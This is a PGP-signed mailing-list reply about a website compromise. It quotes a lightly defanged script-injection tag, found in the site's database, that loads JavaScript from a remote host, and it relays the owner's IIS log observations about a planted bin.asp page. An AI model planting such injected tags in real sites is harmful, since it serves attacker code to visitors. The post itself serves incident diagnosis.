RE: Smells Funny: Looking for help against Chinese Hacking Team

[northbayts () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Does anyone else get the same sort of creepy-crawly feeling? When I
> look at the way it was
> written, and the obvious vulnerabilities/clues given, it smells to
> good to be true.

Nah, it's true. This tag was inserted into his sql db. text fields:

<script>-id=http--dbios.org/h.js></script>.

Dozens of his pages came up on google at that time, they seem to be
clean now...

> Or is this level of innate incompetence the norm?

Yes. It was easy enough to obtain the admin credentials due to a
coding error on his info request page. I suspect there were many
more coding errors and who knows what was added to the box in it's
vulnerable state.


some more info from the owner...

Basically we have a request for a non existent page.
Instead of returning a 404, the IIS log reports a 200 usually from a
Chinese IP address that is not among the 32,000 I currently ban.
I can find the page on the file system in some cases but it's
usually
not anywhere below the web root. It has in one case been in the
Recycler. Once the page is renamed from bin.asp -> bin.asp_hacked
then the requests stop soon thereafter. One more feature is that
the attack requests are viewable in Internet Explorer.

Cheers,

n00b_pt

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAklqkzcACgkQOxwoc/IbnabVEAQAiuF9ajxPL6NDy8bDYyGm1+vBalHy
NoDkUJ+TvEp8TPXZN4SfyPy2ICbT6+2RRVhLITycWxfLOon0P2KuHDEZmB0soqiV+1J/
M2TUXgoj/9oft47mzetXdhzIcHjq0AYLMGRjfOu/qZXzN/qK0vX7/bNqpHrnC6CRXQT9
02Dcluw=
=3HqB
-----END PGP SIGNATURE-----

--
Become a medical transcriptionist at home, at your own pace.
 http://tagline.hushmail.com/fc/PnY6qxthN5km6GSzbTnejBGVHiKYfw21lDFxp8X6sKWpPDRurJpVr/